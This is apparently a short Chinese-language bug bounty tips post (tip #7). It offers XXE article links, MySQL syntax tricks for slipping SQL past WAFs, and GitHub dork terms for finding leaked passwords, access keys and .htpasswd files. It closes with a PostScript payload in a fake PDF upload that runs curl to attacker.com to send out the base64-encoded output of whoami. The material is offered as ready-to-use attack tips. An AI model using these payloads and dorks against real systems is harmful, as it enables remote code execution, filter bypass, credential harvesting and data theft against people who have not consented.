bugbountytip#7

未分类 Admin 9个月前 (10-23) 224次浏览

1、application/json->application/xml ->xxe内部dtd读取文件

文章地址:https://www.freebuf.com/video/216156.html

视频地址:https://v.qq.com/x/page/f3006zyi447.html

Exploiting XXE with local DTD files

https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/

 

2、MySQL tricks

Some MySQL tricks to break some #WAFs out there.

SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`

 

3、Top GitHub Dorks

https://github.com/techgaun/github-dorks

 

password
dbpassword
dbuser
access_key
secret_access_key
bucket_password
redis_password
root_password
HOST=http://smtp.gmail.com
filename:.htpasswd
extension:sql mysql dump

 

4、RCE on PDF upload

 

Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf"
Content-Type: application/pdf

%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) )
.putdeviceparams
quit

 

喜欢 (1)